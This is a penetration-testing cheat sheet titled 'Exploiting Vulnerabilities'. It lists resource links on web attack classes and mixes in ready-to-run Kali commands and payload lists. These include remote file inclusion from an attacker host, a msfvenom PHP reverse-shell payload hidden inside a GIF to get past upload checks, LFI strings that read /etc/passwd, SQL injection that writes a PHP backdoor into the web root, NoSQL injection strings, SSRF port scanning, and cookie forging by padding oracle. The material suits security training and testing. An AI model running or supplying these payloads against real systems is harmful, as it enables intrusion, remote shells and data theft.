Skip to content

Chapter 3 - Exploiting Vulnerabilities

That was the division in the hacking world: There were people who were exploring it and the people who were trying to make money from it. And, generally, you stayed away from anyone who was trying to make money from it.

_— **_**Jeff Moss

Finding Exploits

Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i local
Search Google

Google> site:exploit-db.com exploit kernel <= 3

Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*
Search Vulners

Vulners Audit

Compiling Exploits

Compile for Windows
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile for Architectures
Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)

Breaking out of Virtualization

Breaking into the Data Centre

VENOM Vulnerability

WebSockets

Hacking with WebSockets HTML5

IPV6

Penetration testing with IPv6

How to pwn things with IPv6

HTTP

Resources

OWASP AppSec Videos

OWASP Testing Guide

Cracking the Lens: Attacking HTTPs hidden attack surface

How I hacked hundreds of companies through their helpdesk

Headers
Send fake IP
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
XXE
Resources

Exploitation: XML External Entity XXE Injection

Exploiting a Real-World XXE Vulnerability

Exploiting XXE Vulnerabilities in file parsing

XSS
Resources

XSS Attack: Busting browsers to root

DOM Clobbering

DOM Flow - Untangling the DOM

CORS

Resources

Exploiting Misconfigured CORS

CSRF
Resources

Computerphile: Cross Site Request Forgery

Updating Anti-CSRF Tokens with BurpSuite

SSRF
Resources

What is Server side Request Forgery?

A New Era of SSRF

Exploiting Server Side Request Forgery on a Node/Express Application hosted on Amazon EC2

Example

Sometimes what appears to be RFI can lead to SSRF, here are some commands to help

# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ

# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
RCE

Resources

Node.js Remote Code Execution as a Service

Exploiting Python code execution in the web

Big List of Naughty Strings

PHP Generic Gadget Chains

Utilizing Code Re-use or ROP in PHP Exploits

Pwning PHP Mail Function for fun and RCE

Server Side Template Injection

Resources

Server Side Template Injection

Server Side Template Injection: RCE for the Modern WebApp

API

Resources

Cracking & Fixing REST APIs

LFI
Resources

Local File Inclusion Testing Techniques

Insecure PHP Functions & their Exploits LFI/RFI

LFI and RFI -- The Website Security Vulnerability

Local File Inclusion to Remote Code Execution

Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts

Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
    send post data
expect://whoami
Open Redirects
Resources

Open URL Redirects

RFI
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Padding Oracle Attack
Resources

Automated Padding Oracle Attacks with Padbuster

Arguments
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Examples
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
                                -cookies "ENC-COOKIE"
                                -plaintext '{"user":"admin","role":"admin"}'
AWS

Resources

AWS PENETRATION TESTING PART 1. S3 BUCKETS

File Upload
Make a backdoor GIF
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST
                -F "field1=test"
                -F "file=@/home/user/evil.gif"
                http://$TARGET/upload.php
                --cookie "cookie"

E-Mail

Resources

How to Bypass E-Mail gateways using common payloads

iSCSI

Resources

An interesting route to domain admin via ISCSI

Databases

MySQL
Resources

SQL Injection

SQLMap tricks for advanced SQL injeciton

Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
MSSQL
Resources

PenTest & Hack MSSQL

SQL Injection Cheatsheet MSSQL

MongoDB
Resources

NoSQL Map

Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);

PBX

Resources

Pentesting VOIP

Introduction to Telephony and PBX

Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET